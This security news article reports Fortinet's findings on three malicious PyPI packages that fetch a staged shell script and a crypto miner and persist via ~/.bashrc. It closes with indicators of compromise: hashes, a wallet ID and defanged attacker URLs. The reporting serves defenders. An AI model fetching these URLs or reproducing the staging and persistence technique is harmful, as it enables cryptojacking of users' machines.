Fortinet researchers identified three malicious packages in the PyPI repository—modularseven, driftme, and catme. These packages, attributed to the same author, “sastra,” were specifically crafted to target Linux systems and install crypto mining software. Notably, the author created a PyPI account shortly before uploading these packages.
3 Malicious PyPI Packages
“Upon initial use, these packages deploy a CoinMiner executable on Linux devices,” noted Fortinet FortiGuard Labs researcher Gabby Xiong. She highlighted that this campaign exhibits similarities with a previous one that utilized a package named “culturestreak” to install a crypto miner.
The malicious code is embedded in the init.py file, which decodes and fetches the first stage from a remote server. This initial stage is a shell script (“unmi.sh”) responsible for obtaining a configuration file for the mining operation and the CoinMiner file hosted on GitLab.
The ELF binary file is executed in the background using the nohup command, ensuring the process persists after session exit. Following the pattern of the earlier ‘culturestreak’ package, these packages hide their payload, reducing detectability by hosting it on a remote URL. The payload is released incrementally in different stages to carry out its malicious activities.
The connection to the culturestreak package is evident as the configuration file is hosted on the domain papiculo[.]net, and the coin mining executables are hosted on a public GitLab repository.
A notable enhancement in the three new packages is the incorporation of an additional stage, concealing their malicious intent within the shell script. This strategy aids in evading detection by security software and prolongs the exploitation process.
“Furthermore, the malware injects malicious commands into the ~/.bashrc file,” Xiong explained. “This inclusion guarantees the persistence and reactivation of the malware on the user’s device, effectively prolonging the duration of its covert operation. This approach facilitates the extended and discreet exploitation of the user’s device for the attacker’s advantage.”
IOCs
unmi.sh
070128a5b4e1aecb61b59f3f8ef2602e63cd1e5357f1314080a7c8a4960b0bee
modularseven-1.0/modularseven/processor.py
4b439d8cabc5e4ad593a26065e6d374efdddf41c8d91744b077a69812df170d2
driftme-1.0/driftme/processor.py
687fb012479e563be63e02718eb7be7ee81974193c952777ca94234c95b25115
catme-1.0/catme/processor.py
235b1ad3d21e7330d421c9a03b6b822fcdddacaa707bed9d67dabd43d4401fc6
tmp/X
df0211bf54174b5766366eecfb0a04c4a59346478e1507b6685fbaed6b2d2aca
XLM:GA2DR34VWSXPIE2JFDUZFEIROMXRFYUYNB2XD5JWKPD2TWELUJQZ4WCW.WORKER
Malicious URLs
hxxps[:]//papiculo[.]net/unmi[.]sh
hxxps[:]//papiculo[.]net/unmiconfig[.]json
hxxps[:]//gitlab[.]com/ajo9082734/Mine/-/raw/main/X
Follow Us on: Twitter, Instagram, Facebook to get the latest security news!
Leave A Comment